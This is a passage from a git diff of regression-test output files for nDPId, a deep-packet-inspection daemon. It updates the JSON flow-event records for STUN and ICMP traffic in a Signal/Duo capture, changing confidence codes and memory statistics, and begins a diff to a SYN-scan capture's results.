{"3":"DPI (partial)"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1636901958294,"flow_last_seen":1636901970409,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":7870,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936070,"flow_last_seen":1636901939887,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014416,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936663,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998588,"flow_last_seen":1636902019979,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956929,"flow_last_seen":1636901980724,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1636901956886,"flow_last_seen":1636901987907,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956921,"flow_last_seen":1636901978319,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998589,"flow_last_seen":1636902019976,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1636902000073,"flow_last_seen":1636902002742,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":6170,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1636901998654,"flow_last_seen":1636902021384,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":1768,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1636901958294,"flow_last_seen":1636901970409,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":7870,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936070,"flow_last_seen":1636901939887,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014416,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936663,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998588,"flow_last_seen":1636902019979,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956929,"flow_last_seen":1636901980724,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1636901956886,"flow_last_seen":1636901987907,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956921,"flow_last_seen":1636901978319,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998589,"flow_last_seen":1636902019976,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1636902000073,"flow_last_seen":1636902002742,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":6170,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1636901998654,"flow_last_seen":1636902021384,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":1768,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","packets-captured":460,"packets-processed":460,"total-skipped-flows":0,"total-l4-payload-len":29600,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":22,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":23,"total-idle-flows":23,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":141,"global_ts_msec":1636902021384} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 460/460 @@ -147,9 +147,9 @@ ~~ total active/idle flows...: 23/23 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5914443 bytes -~~ total memory freed........: 5914443 bytes -~~ total allocations/frees...: 118670/118670 +~~ total memory allocated....: 6048077 bytes +~~ total memory freed........: 6048077 bytes +~~ total allocations/frees...: 121432/121432 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 844 chars diff --git a/test/results/synscan.pcap.out b/test/results/synscan.pcap.out index 911ceeee5..3c5a450f2 100644 --- a/test/results/synscan.pcap.out +++ b/test/results/synscan.pcap.out @@ -1499,7 +1499,6 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 